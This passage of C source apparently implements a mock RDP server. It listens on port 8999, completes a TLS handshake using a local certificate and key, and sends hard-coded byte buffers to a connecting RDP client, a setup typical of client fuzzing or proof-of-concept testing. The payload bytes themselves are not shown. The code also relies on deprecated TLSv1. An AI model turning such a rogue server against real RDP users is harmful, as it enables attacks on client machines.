		0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
		0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
	};//unsigned char cd8[] = {};
	respose_to_rdp_client(cd6, 820);
	respose_to_rdp_client(cd7, 1095);
	//respose_to_rdp_client(cd2, 72);
	getchar();
	// all over
	return 0;
}

DWORD WINAPI accept_handle_connection() {
	ClientSocket = accept(ListenSocket, NULL, NULL);
	if (ClientSocket == INVALID_SOCKET) {
		printf("accept failed with error: %d\n", WSAGetLastError());
		return 1;
	}

	if (start_establish() == -1)
	{
		printf("start establish failed!!!\n");
		return -1;
	}

	if (ssl_established() == -1)
	{
		printf("ssl establish failed!!!\n");;
		return -1;
	}

	recv_loop();
	return 0;
}

int  run() {


	ssl_clear();
	if (hr != NULL)
		if (WaitForSingleObject(hr, 0) != WAIT_OBJECT_0)
		{
			TerminateThread(hr, 0);
		}

	accept_handle_connection();

	return 1;
}

int init() {
	static WSADATA wsaData;
	static int iResult;
	static struct addrinfo *result = NULL;
	static struct addrinfo hints;
	static int iSendResult;

	unsigned char server_bind_port[] = "8999";

	SSL_library_init();
	OpenSSL_add_all_algorithms();
	SSL_load_error_strings();
	ctx = SSL_CTX_new(TLSv1_server_method());
	
	if (SSL_CTX_use_certificate_file(ctx, "E:\\openssl-ca\\cacert.pem", SSL_FILETYPE_PEM) <= 0)
	{
		ERR_print_errors_fp(stdout);
		ExitProcess(1);
	}
	if (SSL_CTX_use_PrivateKey_file(ctx, "E:\\openssl-ca\\privkey.pem", SSL_FILETYPE_PEM) <= 0)
	{
		ERR_print_errors_fp(stdout);
		ExitProcess(1);
	}
	
	if (!SSL_CTX_check_private_key(ctx))
	{
		ERR_print_errors_fp(stdout);
		ExitProcess(1);
	}


	iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	if (iResult != 0) {
		printf("WSAStartup failed with error: %d\n", iResult);
		return 0;
	}

	ZeroMemory(&hints, sizeof(hints));
	hints.ai_family = AF_INET;
	hints.ai_socktype = SOCK_STREAM;
	hints.ai_protocol = IPPROTO_TCP;
	hints.ai_flags = AI_PASSIVE;


	iResult = getaddrinfo(NULL, (PCSTR)server_bind_port, &hints, &result);
	if (iResult != 0) {
		printf("getaddrinfo failed with error: %d\n", iResult);
		WSACleanup();
		return 0;
	}


	ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
	if (ListenSocket == INVALID_SOCKET) {
		printf("socket failed with error: %ld\n", WSAGetLastError());
		freeaddrinfo(result);
		WSACleanup();
		return 0;
	}


	iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen);
	if (iResult == SOCKET_ERROR) {
		printf("bind failed with error: %d\n", WSAGetLastError());
		freeaddrinfo(result);
		closesocket(ListenSocket);
		WSACleanup();
		return 0;
	}

	freeaddrinfo(result);

	iResult = listen(ListenSocket, SOMAXCONN);
	if (iResult == SOCKET_ERROR) {
		printf("listen failed with error: %d\n", WSAGetLastError());
		closesocket(ListenSocket);
		WSACleanup();
		ExitProcess(-1);
		return 0;
	}
	printf("init finished\n");
	return 1;
}


int main()
{
	printf("start\n");
	init();
	run();
	return 0;
}

